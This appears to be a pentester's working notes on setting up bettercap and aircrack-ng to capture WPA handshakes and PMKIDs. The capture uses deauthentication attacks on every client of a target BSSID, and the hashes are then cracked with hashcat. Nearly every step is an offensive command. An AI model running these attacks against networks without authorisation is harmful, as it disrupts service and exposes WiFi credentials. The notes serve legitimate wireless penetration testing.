Skip to main content

bettercap

bettercap is "The Swiss Army knife for WiFi, Bluetooth Low Energy, wireless HID hijacking, CAN-bus and IPv4 and IPv6 networks reconnaissance and MITM attacks."

warning

Totally underconstruction while I review bettercap's CLI and see what's still relevant.

Connect USB wifi to ESXi/Proxmox

In ESXI, shut down the host, then add a new USB device and choose "Realtek 802.11n NIC"

Kill processes on the Kali VM that might screw stuff up:

Install aircrackng

sudo apt install aircrack-ng -y

Kill services that might conflict with wifi shenanigans

sudo airmon-ng check kill

Start monitoring on the wifi card

Enumerate your wifi interface

iwconfig

Using the name of your wifi interface, start it in monitoring mode

sudo airmon-ng start wlan0

Check what your new monitoring interface is

iwconfig

You'll likely see wlan0mon or something similar

Install via Go (Ubuntu 24.04)

sudo apt update
sudo apt install -y pkg-config libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev -y
sudo apt install golang-go -y
go install github.com/bettercap/bettercap@latest

Install/run using Docker

sudo docker run -it --privileged --net=host bettercap/bettercap -iface wlan0

Set wifi capture file (warning: if you don't set this now and want to change it, you have to RESTART the wifi recon function)

set wifi.handshakes.file /root/captures.pcap

Set wifi.deauth acquired to true (optional)

What I found during testing is that I would capture a lot of "half" handshakes but never the full ones. After reading this Github [issue] (https://github.com/bettercap/bettercap/issues/889) I tried setting "set wifi.deauth.acquired true" and then I started getting full handshakes!

set wifi.deauth.acquired true

Get wifi recon going!

wifi.recon on

Troubleshooting tip

tip

I've run into some issues getting the wifi.recon on command to execute - due to some issues calling the iw executable. But I don't know that that's the actual issue. Reading further, I'm having problems like this GitHub issue mentions where I try to put Bettercap into recon mode and it complains of [17:58:47] [sys.log] [war] wifi could not set interface wlan0 txpower to 30, 'Set Tx Power' requests not supported. So I followed a recommendation in that article to install this driver like this:

sudo apt-get install dkms -y
cd ~/
git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
cd rtl
sudo make dkms_install
make && make install

Sort networks by # of clients connected

set wifi.show.sort clients desc

Every second, clear out our view and then present an updated list of nearby WiFi networks:

set ticker.commands 'clear; wifi.show'

Filter out client probes

events.ignore wifi.client.probe

Filter out client disconnections

events.ignore wifi.client.lost

Filter out new APs that come online

events.ignore wifi.ap.new

Filter out new clients that come online

events.ignore wifi.client.new

Filter out lost connections with APs

events.ignore wifi.ap.lost

Show networks that ONLY start with 7MS:

set wifi.show.filter ^7MS

Turn on ticker

ticker on

Set channel to the one you're attacking

wifi.recon.channel X

Disassociate all clients on a given BSSID to capture handshakes!

wifi.deauth 11:22:33:44:55:66

Assoc with target SSID to do the PKMID attack

wifi.assoc all

-or-

wifi.assoc 11:22:33:44:55:66

Clear SSID filter

set wifi.show.filter ^

Clear wifi.recon.channel filter

wifi.recon.channel clear

Figure out the container ID for bettercap

sudo docker ps

Copy files from docker to hard drive

First, make note of the ID (noted with "XXX" below). If you didn't change the default path, you should be able to see captured files in the /root folder. Try listing them with:

sudo docker exec XXX ls /root/

Now you can copy them out of the docker and into your current folder:

sudo docker cp XXX:/root/captures.pcap .

Convert .pcap files to hccapx files

sudo /usr/lib/hashcat-utils/cap2hccapx.bin wifi-handshakes.pcap wifi-handshakes-converted.hccapx

Crack w/hashcat!

sudo /path/to/hashcat -m2500 converted-file.hccapx wordlist.txt

If this doesn't work ^^^, it looks like the new standard hash type might be m22000 per this article. In that case, here's what I did on the pcap itself to get it ready for hashcat:

sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap

One time I had problems with my .cap file from bettercap and had to do this to clean it up:

tshark -r my-cap-file-from-bettercap.cap -R "(wlan.fc.type_subtype == 0x00 || wlan.fc.type_subtype == 0x02 || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x05 || wlan.fc.type_subtype == 0x08 || eapol)" -2 -F pcapng -w stripped.pcapng

Then convert from .pcapng to .pcap

editcap -F pcap stripped.pcapng stripped.pcap